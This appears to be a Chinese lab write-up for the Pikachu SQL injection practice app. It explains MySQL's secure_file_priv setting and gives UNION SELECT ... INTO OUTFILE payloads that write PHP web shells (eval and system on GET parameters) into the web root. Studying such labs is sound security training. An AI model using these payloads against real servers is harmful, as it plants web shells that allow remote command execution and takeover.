Pikachu-Sql-Inject - 通过sql进行远程服务器控制(试验)

secure_file_priv是MySQL中的系统变量,用于限制文件的读取和写入。

查看命令:

复制代码
show variables like "secure%" 
//或者
select @@secure_file_priv;

1.secure_file_priv = NULL ,限制文件的读取和写入。

2.secure_file_priv = 文件路径 ,限制文件的读取和写入只能在设定的文件夹中。

3.secure_file_priv= "", 对文件和读取和写入没有任何限制。

into outfile ,将select 的结果写入到指定的文件中;

复制代码
vince' union select " <?php @eval($_GET['test'])?>",2 into outfile "/var/www/html/1.php"#
vince' union select " <?php system($_GET['cmd'])?>",2 into outfile "/var/www/html/2.php"#

//构造sql
vince' union select " <?php system($_GET['cmd'])?>",2 into outfile "/var/lib/mysql-files/2.php"#

执行sql语句

进入到服务器目录下,看到文件已生成;

这个实验有三个前提条件:

1、需要知道远程服务器的文件目录;

2、需要该目录有写权限;

3、需要数据库开启secure_file_priv权限;

相关推荐
李子红了时3 小时前
【墨铺网教程】一台电脑加入多个局域网,让电脑做上传下载主力又当存储盘
运维·服务器·电脑
m0_564264183 小时前
IDEA DEBUG调试时如何获取 MyBatis-Plus 动态拼接的 SQL?
java·数据库·spring boot·sql·mybatis·debug·mybatis-plus
Awkwardx4 小时前
Linux系统编程—线程同步与互斥
linux·服务器
隐语SecretFlow5 小时前
隐语SecreFlow SCQL 1.0.0b1 发布:更完善的 SQL 支持与更高效的隐私查询引擎
数据库·sql
晨陌y6 小时前
深入剖析:仓颉语言的性能优化核心技术
android·性能优化·仓颉
xhbh6666 小时前
【实战总结】MySQL日期加减大全:日期计算、边界处理与性能优化详解
android
00后程序员张7 小时前
如何提高 IPA 安全性 多工具组合打造可复用的 iOS 加固与反编译防护体系(IPA 安全 iOS 加固 无源码混淆 Ipa Guard 实战)
android·安全·ios·小程序·uni-app·iphone·webview
张拭心7 小时前
“不卷 AI、不碰币、下班不收消息”——Android 知名技术大牛 Jake Wharton 的求职价值观
android·前端·aigc
www.027 小时前
linux服务器升级显卡驱动(笔记)
linux·运维·服务器·笔记·ubuntu·服务器环境
Linux-palpitate7 小时前
基于Prometheus和Grafana的MySQL监控,服务器监控
服务器·grafana·prometheus